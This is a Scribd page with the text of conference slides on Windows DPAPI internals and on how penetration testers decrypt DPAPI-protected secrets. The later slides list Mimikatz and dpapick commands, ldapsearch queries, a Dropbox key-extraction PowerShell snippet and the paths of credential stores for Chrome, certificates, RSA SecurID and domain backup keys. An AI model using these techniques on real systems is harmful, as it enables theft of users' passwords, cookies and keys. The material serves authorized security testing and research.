Scribd
Upload
341 views63 pages

12-00 Windows DPAPI Sekretiki

This document discusses Windows Data Protection API (DPAPI) and how pentesters can leverage it. DPAPI is used to encrypt credentials, certificates, and other sensitive data using a master key protected by the user's password or credentials. The document covers how DPAPI works internally, decrypting DPAPI blobs using tools like Mimikatz and Dpapick, decrypting credentials stored in browsers like Chrome, decrypting certificates, and decrypting credentials synced across devices via roaming. It provides technical details on DPAPI and practical techniques pentesters can use to decrypt credential data protected by DPAPI.

Uploaded by

Вячеслав Казанцев
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
341 views63 pages

12-00 Windows DPAPI Sekretiki

This document discusses Windows Data Protection API (DPAPI) and how pentesters can leverage it. DPAPI is used to encrypt credentials, certificates, and other sensitive data using a master key protected by the user's password or credentials. The document covers how DPAPI works internally, decrypting DPAPI blobs using tools like Mimikatz and Dpapick, decrypting credentials stored in browsers like Chrome, decrypting certificates, and decrypting credentials synced across devices via roaming. It provides technical details on DPAPI and practical techniques pentesters can use to decrypt credential data protected by DPAPI.

Uploaded by

Вячеслав Казанцев
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 63

Windows DPAPI “Sekretiki”

or
DPAPI for pentesters

Konstantin Evdokimov
Head of Pentest team, «М 13» Ltd.
About me

• Red-teamer/ pentester / researcher in M-13 Ltd


• About 6 years in Infosecurity
• Offensive / defensive projects
• APT / Red-Teams researching
DPAPI – WTF ?

• DPAPI – Windows Data Protection API


• MS says: «The public DPAPI interfaces are part of Crypt32.dll and
are available for any user process that has loaded it»
• From Windows 2000
• Simple Interface
Crypt my data
Crypt
Decrypt my data
Data
Decrypt
DPAPI – WTF ? MS says:
DPAPI – WTF ?

Ok, but I am a lamer…


DPAPI – WTF ?

Ok, but I am a coder…

CryptProtectData() CryptUnProtectData()

Password
DPAPI – WTF ?

CurrentUser LocalMachine
decrypt decrypt

Only that User Only that Machine


DPAPI – WTF ?

Only one…
or..
Almost only one…
DPAPI – For Pentesters… Not for forensics
About DPAPI – many and many times
• BlackHat 2010
• PasScape, SynActiv (many thanks !!!)
• J.Michel Pickod (dpapick)
• Benjamin DELPY (mimikatz)

Pentesters view to DPAPI


• No Mimikatz (because AV, HIPs, FireEYE, CroudStrike)
• No Online decryption - Only Offline
• Flexible, but DPAPICK last Commit – 2014
DPAPI Inside
DPAPI inside
No Crypto, please…
Masterkey

DPAPI
password
blob

SID
Data
DPAPI inside
No Crypto, please…
Masterkey

DATA
password

SID DPAPI
blob
DPAPI inside Crypto, Hm… I love It…
• https://msdn.microsoft.com/en-us/library/ms995355.aspx
DPAPI inside Crypto, Hm… I love It…

Salt 64 rnd

password Pre-key Master DPAPI


key AES blob
SID
Iter N
DPAPI inside master-key
64 byte RND

MasterKey
IterN
PreKey AES
Salt
HMAC
DPAPI inside Pre-key
SHA1
password utf16le(passw) MD4

HMAC Key
SID utf16le(SID+\0) HMAC
random

Salt PBKDF2 Iter N

PreKey
DPAPI inside Encrypt Data
PreKey 64 byte MK Entropy
MasterKey
IterN
Salt AES AES
HMAC Decr Data
Encr

DPAPI
BLOB
DPAPI inside Decrypt Data

PreKey

Masterkey AES 64 byte MK

DPAPI AES Decrypted


BLOB Decr Data
DPAPI inside OS variations
OS Encrytion Hash PBKDF2
iterations
XP 3DES SHA1 4000

Vista 3DES SHA1 24000

7 AES SHA512 5600

10 AES SHA512 20000


DPAPI inside DPAPI hardening

HKLM\Software\Microsoft\Cryptography\Protect\Pr
oviders\df9d8cd0-1501-11d1-8c7a-00c04fc297eb\
Value: MasterKeyIterationCount
Data type: REG_DWORD

Value: Encr Alg, Encr Alg Key Size


Data type: REG_DWORD

Value: MAC Alg, MAC Alg Key Size


Data type: REG_DWORD
DPAPI inside A-A-A-A-A-A

Masterkey

DPAPI
SID
BLOB

Password
hash
DPAPI inside Password change and CREDHIST

P@ssw0rd -> P@ssw0rd1


Masterkey1 BLOB1
CREDHIST Masterkey2 BLOB2
file
Masterkey3 BLOB2

Masterkey4 BLOB2
DPAPI inside Password change and CREDHIST
DPAPI inside Domain Password Reset
DPAPI Backup Key Protocol

Domain
RSA RSA
Key
pub priv

RPC
Domain
PC Controller
Decrypted
Masterkey
DPAPI inside User Masterkey
c:\Users\%USER%\AppData\Roaming\Microsoft\Protect\%SID%\
DPAPI inside System Masterkey
С:\windows\system32\Microsoft\Protect\S-1-5-18\
DPAPI inside
MasterKey

• 010 Editor
• Masterkey template
• Win10 Non-Domain
DPAPI inside
DomainKey

• Domain Masterkey
backup
• Win10 Domain
joined
DPAPI inside

Masterkey block
header
• PBKDF2 Rounds
• Idhash - SHA512
• idCipher - AES
DPAPI inside

010 Editor
Masterkey
key material
DPAPI inside DPAPI BLOB

• Masterkey GUID
• Idhash
• Salt
• HMACs
• IdAlgCrypt
DPAPI inside
010 Editor
DPAPI Blob template
• Mkey GUID
• Idhash
• Salt
• HMACs
• IdAlgCrypt
DPAPI inside DPAPI Blob
First Bytes: 01 00 00 00 D0 8C 9D DF 01 15…

Cryptoprovider GUID: df9d8cd0-1501-11d1…


Hex: 01 00 00 00 D0 8C 9D DF 01 15…

Base64: AQAAANCMnd8BFdER…
DPAPI, Pentesters guide
DPAPI Usage…
• SYSTEM
• Certificates
• EFS
• WIFI
• IE
• CredVault
• Application
• Google (chrome, gtalk)
• Skype
• Dropbox
• Auth – RSA SecurID
Decrypting DPAPI… Bruteforcing password

hashcat –m 15300 …

DPAPImk2john.py …

…not Win10 Domain


Decrypting DPAPI Blobs…
• System tools
• Powershell –
[Security.Cryptography.ProtectedData]::Unprotect(…)
• Mimikatz
• Online mimikatz
• Offline mimikatz
• Passcape Password Recovery
• Dpapick – Python, flexible
• Impacket – from v19
Decrypting DPAPI Blobs… User Context

• User Context
• Gui, RDP password hash
• Schtasks
• Runas
• Non-User Context
No password
• Impacket (wmiexec, smbexec, dcomexec)
• PsExec, Restricted admin
• Meterpreter ?
No hash
Using DPAPI … Powershell

“Password”

“Password”
Decrypting DPAPI… Chrome…

Cookie file location: %localappdata%\Google\Chrome\User


Data\Default\Cookies
Login data location: %localappdata%\Google\Chrome\User
Data\Default\Login Data
SQLite Database
DPAPI Blobs – User masterkey
Decrypting DPAPI… Chrome…
Mimikatz - User Context
dpapi::chrome /in:”%localappdata%\Google\Chrome\User
Data\Default\Cookies” /unprotect

Mimikatz Non-user Context


dpapi::masterkey /in:<..> /sid:<..> /password:<..> /protected
sekurlsa::dpapi

dpapi::chrome /in:”…\Cookies” /masterkey:f35cfc2b44aed… :


Decrypting DPAPI… Chrome…
DPAPICK – Offline Decryption
./chrome.py --cookie <cookiefile> --sid <SID> --password <..>
--masterkey <masterkeydir>

./chrome.py --cookie <cookiefile> --sid <SID> --hash <..> --


masterkey <masterkeydir>

./chrome.py --cookie <cookiefile> --sid <SID> --pkey <rsa-


priv.pem> --masterkey <masterkeydir>
Decrypting DPAPI… DC
Domain Controller – Private Keys
Decrypting DPAPI… DC
Domain Controller – Get Private Keys
• Mimikatz – remote connect
Mimikatz wiki
• NTDS parsing
https://www.dsinternals.com/en/retrieving-dpapi-
backup-keys-from-active-directory/
Decrypting DPAPI… Client Certificates
Client certificates:
• Authentication (VPN, Web APP, CRM,etc)
• EFS (NTFS File Encryption)
• OTR Messengers
Public and Private Key
%APPDATA%\Microsoft\SystemCertificates\My\Certificates\

%APPDATA%\Roaming\Microsoft\Crypto\RSA\<SID>\
Private Key – DPAPI Encrypted with user masterkey
Decrypting DPAPI… Certificate Dpapick
DPAPICK offline decryption
./efs.py --certificates <cert dir> --rsakeys <RSA dir> --password <..> -
-masterkey <masterkeydir>

./efs.py --certificates <cert dir> --rsakyes <RSA dir> --pkey <rsa-


priv.pem> --masterkey <masterkeydir>
Decrypting DPAPI… Credentials Roaming
Roam user credentials and certs from PC to PC

• User login in PC1, imports pfx


• User logout and login to PC2
• User cert avail in PC2
Decrypting DPAPI… Credentials Roaming
GPO AD attributes
Decrypting DPAPI… Credentials Roaming
AD attributes
ldapsearch -x -h dc1.lab.local -D
"[email protected]" -s sub
"samAccountname=anyuser"

ldapsearch -x -h dc1.lab.local -D
[email protected]" -s sub
"samAccountname=user1"
Decrypting DPAPI… Credentials Roaming

msDPAPImasterkeys
mkname = binascii.unhexlify(ldapmk.split(':')[2][6:80]).strip("\x00")
mkdata = binascii.unhexlify(ldapmk.split(':')[2][264:])

msPKIAccountCredentials
pkiname = binascii.unhexlify(ldapmk.split(':')[2][6:150]).strip("\x00")
pkidata = binascii.unhexlify(ldapmk.split(':')[2][264:])
Decrypting DPAPI… Credentials Roaming + dpapick
./efs.py –ldap-server <..> --ldap-connect admin:P@[email protected] --ldap-user
user1 --password Password1
./efs.py –ldap-server <..> --ldap-connect admin:P@[email protected] --ldap-user
user1 --pkey <rsa-priv.pem>
Decrypting DPAPI… DropBox

%LOCALAPPDATA%\Dropbox\instance1\config.dbx – Encrypted SQLIte


%LOCALAPPDATA%\Dropbox\instance_db\instance.dbx
• DPAPI encoded encryption key
\\HKCU\SOFTWARE\Dropbox\ks • Special permissions (dances with
tambourine)
\\HKCU\SOFTWARE\Dropbox\ks1
• Contains DPAPI blobs
$key_bin = (Get-ItemProperty -Path $key_path -Name Client).Client;
$key_version = [BitConverter]::ToUInt32($key_bin, 0);
if ($key_version -ne 0) { Write-Warning "Got version $key_version, expected 0."};
$blob_len = [BitConverter]::ToUInt32($key_bin, 4);
$key_hmac = $key_bin[(8+$blob_len)..($key_bin.length-2)];
$blob_enc = $key_bin[0..(8+$blob_len-1)];
$pr=([System.BitConverter]::ToString($blob_enc));
$pr
Decrypting DPAPI… DropBox+dpapick
./filegeneric --sid <SID> --password <..> --masterkeydir
./dbx/masterkeys/ --inputfile ./dbx/ks1.blob

./filegeneric --sid <SID> --pkey <rsa-priv.pem> --masterkeydir


./dbx/masterkeys/ --inputfile ./dbx/ks1.blob
$hdata="4efebbdf394d4003317fc5c357beac4b"; decrypted blob
[Byte[]] $dv0_entropy = 0xd1,0x14,0xa5,0x52,0x12,0x65,0x5f,0x74,0xbd,0x77,0x2e,0x37,0xe6,0x4a,0xee,0x9b;
$data = ($hdata -split "(?<=\G\w{2})(?=\w{2})" | %{ [Convert]::ToByte( $_, 16 ) });
Add-Type -AssemblyName System.Security;
$dk1 = [system.security.cryptography.protecteddata]::Protect($data,$dv0_entropy,’CurrentUser’);
$pr=([System.BitConverter]::ToString($dk1));$pr
$OBJ_hmac = New-Object System.Security.Cryptography.HMACMD5
$hmac = $OBJ_hmac.ComputeHash($dk1)
$pr=([System.BitConverter]::ToString($hmac));
$pr=‘00000000F6000000’+$pr+$hmac
Decrypting DPAPI… RSA SecurID
• RSA SecurID windows client
• RSA Multifactor Authentications
• OTP (one-time passwords)
%LOCALAPPDATA%\RSA\SecurIDStorage
• SQLite DB
• CryptoCheckSum = DPAPI Encryption
• DBKey = DPAPI Encryption + DPAPI Encryption

EnTokenSid = RSAEncr (DBEncKey,UserSID)


CryptoCheckSum = DPAPI blob(CurrentUser)
DBKeyEnc = DPAPI(CurrentUser, DPAPI(LocalSystem(DBKey))
Decrypting DPAPI… RSA SecurID
• System MasterKeys • Current User MasterKeys
• No PASSWORD
• DPAPI_SYSTEM
• Mimikatz – online
• Mimikatz – offline (SYSTEM, SECURITY)
• Impacket – dpapi module (SYSTEM, SECURITY)
Mimikatz offline example:
Decrypting DPAPI… RSA SecurID
impacket offline example:
Decrypting DPAPI… RSA SecurID
DPAPIck SYSTEM masterkey:
DPAPI for Pentesters Conclusions
• NO mimikatz online ! - OFFLINE decryption

• User Masterkeys
• %APPDATA%\Microsoft\Protect\<SID>\*

• System Masterkeys
• Windows\System32\Microsoft\Protect\*

• DPAPI_SYSTEM
• LSASecrets – online
• SYSTEM, SECURITY (reg save …, system\backup, etc)
DPAPI for Pentesters Conclusions
• User Certificates
• %APPDATA%\Microsoft\SystemCertificates\My\Certificates\
• %APPDATA%\Microsoft\Crypto\RSA\<SID>\
• System Certificates
• HKLM:\SOFTWARE\Microsoft\SystemCertificates\MY\Certificates\*
• C:\Programdata\Microsoft\Crypto\RSA\MachineKeys\
• Chrome
• %localappdata%\Google\Chrome\User Data\Default\Cookies
• %localappdata%\Google\Chrome\User Data\Default\Login Data
• DropBox
• %LOCALAPPDATA%\Dropbox\instance1\config.dbx
• %LOCALAPPDATA%\Dropbox\instance_db\instance.dbx
• HKCU\SOFTWARE\Dropbox\ks
• HKCU\SOFTWARE\Dropbox\ks1
DPAPI for Pentesters Conclusions
• RDP
• Filetype: *.rdg

• Skype
• Account.xml

• ICloud
• Apple own entropy !

• WiFi KEYS
• SYSTEM Masterkeys
DPAPI for Pentesters Conclusions
Our DPAPIck
• Added Win10 Domain decryption (additional PBKDF2 rounds)
• Added domain RSA key decryption
• Added certificate ldap usage
• Added DPAPI_SYSTEM using
• Other modifications
• TODO: RPC masterkey decryption

https://github.com/mis-team/dpapick
DPAPI for All Conclusions
• DPAPI = crypto + crypto + crypto+…
• DPAPI based on UserMasterkey, SystemMasterkeys
• Your master keys is not only yours…
• Your certificate and files is not only yours…
• DPAPI decryption…
• Mimikatz
• DPAPIck
• Powershell
• etc…
• DPAPI everywhere…
• RDP Profiles (rdg)
• Cred vault
• IE, Edge
Thank You !

email: [email protected]
Telegram channel: @mis_team
Github: mis-team

You might also like